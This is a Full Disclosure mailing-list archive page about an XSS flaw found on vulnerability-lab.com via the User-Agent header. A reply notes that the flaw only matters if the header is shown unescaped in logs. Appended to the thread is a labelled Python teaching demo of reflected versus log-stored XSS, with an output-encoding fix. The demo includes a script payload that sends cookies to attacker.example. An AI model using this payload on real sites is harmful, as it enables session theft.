Full Disclosure mailing list archives
Re: Vulnerability-lab.com XSS
From: Ferenc Kovacs <tyra3l () gmail com>
Date: Sun, 5 Feb 2012 21:09:45 +0100
On Fri, Feb 3, 2012 at 4:21 PM, Luis Santana <hacktalk () hacktalk net> wrote:
Earlier today I tried to contact the people over at http://vulnerability-lab.com about an XSS vulnerability I found on their site (ironic) but it appears they want nothing to do with me. Praise Full-Disclosure.

[image: Vulnerability-lab.com XSS - HackTalk Security] http://i.imgur.com/CripA.jpg

The Irony Of A Site For Disclosing Site Being Itself Vuln To Something So Trivial

Basically I tried to report this issue to them through a private message on YouTube and then a follow request on Twitter (so I could DM them) but to no avail. Eventually rem0ve joined freenode and messaged me and told me he didn’t want to be cooperative with me or even be friendly. Sometimes being a prick just makes you look like an idiot.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Judging from the screenshot, it seems to be a reflected XSS through the User-Agent field. I would be curious how this could be exploited from the client side, as you can't manipulate other visitors' User-Agent header. Of course, if the User-Agent is logged and the admin area which displays the logs has the same defect, then this is a different story.

--
Ferenc Kovács
@Tyr43l - http://tyrael.hu
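To make the distinction in the reply above concrete, here is an added example; it is not code from the thread, from vulnerability-lab.com or from either poster. It models a page that echoes the requester's own User-Agent (reflected, only the sender sees it), an access log that stores the header, and an admin log viewer in a vulnerable form and an output-encoded form. The payload string, the attacker.example host and every function name are assumptions made for the demonstration.

```python
# Added example (not from the thread): models the two scenarios in the
# reply. The page names no URLs, parameters or code, so the "site" here
# is a toy: two page renderers and an in-memory access log.
import html

# Constructed attacker User-Agent; the real payload is not on the page.
EVIL_UA = ('<script>document.location="http://attacker.example/?"'
           '+document.cookie</script>')


def render_reflected_page(request_headers):
    """Vulnerable: echoes the requester's *own* User-Agent into the page.
    Only the sender of that request sees the result. A link or an
    <iframe> cannot set the User-Agent header of another visitor's
    browser, so there is no client-side delivery to a victim."""
    ua = request_headers.get("User-Agent", "")
    return f"<p>Your browser: {ua}</p>"


def log_request(access_log, request_headers):
    """The server writes the raw User-Agent to its log (normal behaviour)."""
    access_log.append({"ua": request_headers.get("User-Agent", "")})


def render_admin_log_vulnerable(access_log):
    """Admin log viewer with the same defect: the stored header is emitted
    unescaped, so the attacker's script now runs in the admin's browser.
    This is the 'different story': reflected has become stored."""
    rows = "".join(f"<tr><td>{e['ua']}</td></tr>" for e in access_log)
    return f"<table>{rows}</table>"


def render_admin_log_fixed(access_log):
    """Same viewer with output encoding: html.escape turns <, >, &, and
    quotes into entities, so the log line is displayed as text."""
    rows = "".join(
        f"<tr><td>{html.escape(e['ua'], quote=True)}</td></tr>"
        for e in access_log
    )
    return f"<table>{rows}</table>"


def contains_live_script(markup):
    """Crude check for the demo: a literal <script> tag survived rendering."""
    return "<script>" in markup


def demo():
    """Runs both scenarios and returns which party ends up executing the
    payload. Requests are constructed inline; nothing leaves the process."""
    log = []
    attacker_request = {"User-Agent": EVIL_UA}
    victim_request = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64)"}

    # 1. Reflected: each visitor only ever gets their own header back.
    attacker_view = render_reflected_page(attacker_request)
    victim_view = render_reflected_page(victim_request)

    # 2. Stored via the log: attacker sends one request, admin opens the
    #    log viewer later.
    log_request(log, attacker_request)
    log_request(log, victim_request)

    return {
        "attacker_sees_own_payload": contains_live_script(attacker_view),
        "victim_unaffected_by_reflection": not contains_live_script(victim_view),
        "admin_vulnerable": contains_live_script(render_admin_log_vulnerable(log)),
        "admin_fixed": not contains_live_script(render_admin_log_fixed(log)),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The fix is the same in both places: encode at the point where the header is written into HTML, not at logging time, so the log keeps the raw value for forensics while the viewer displays it as text.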
Current thread:
- Vulnerability-lab.com XSS Luis Santana (Feb 03)
- Re: Vulnerability-lab.com XSS Ferenc Kovacs (Feb 05)
- <Possible follow-ups>
- Re: Vulnerability-lab.com XSS doomxd () gmail com (Feb 03)
- Re: Vulnerability-lab.com XSS doc mombasa (Feb 04)
- Re: Vulnerability-lab.com XSS Valdis . Kletnieks (Feb 04)
- Re: Vulnerability-lab.com XSS Sanguinarious Rose (Feb 06)
- Re: Vulnerability-lab.com XSS Ian Hayes (Feb 06)
- Re: Vulnerability-lab.com XSS Sanguinarious Rose (Feb 06)
- Re: Vulnerability-lab.com XSS Valdis . Kletnieks (Feb 06)
- Vulnerability-lab.com XSS lulzlab (Feb 05)
- Re: Vulnerability-lab.com XSS RandallM (Feb 05)
- Re: Vulnerability-lab.com XSS Luis Santana (Feb 06)